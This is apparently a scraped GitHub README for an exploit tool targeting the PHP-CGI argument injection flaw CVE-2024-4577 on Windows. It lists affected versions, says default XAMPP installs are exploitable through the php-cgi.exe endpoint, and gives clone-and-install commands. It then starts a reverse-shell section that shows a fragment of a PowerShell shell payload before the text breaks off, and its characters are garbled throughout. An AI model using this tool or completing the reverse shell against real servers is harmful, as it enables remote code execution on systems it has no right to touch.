PHP CGI Argument Injection (CVE-2024-4577) RCE ## ๐ Description In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. "XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode." ## ๐ Table of Contents โ ๐ [Description](#-description) โ ๐ ๏ธ [Installation](#-installation) โ โ๏ธ [Usage](#-usage) โ ๐ [References](#-references) ## ๐ ๏ธ Installation โ`bash $ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git $ cd CVE-2024-4577-RCE && pip install -r requirements.txt โ` ## โ๏ธ Usage  ## ๐ค Establishing reverse shell ### PHP Payload > [!NOTE] > This tool demonstrates realistic attack techniques (TTPs). However this specific payload sample does not function in this scenario. โ`php # rev_shell.php &1 | Out-String );$sendback2 =โฆRead More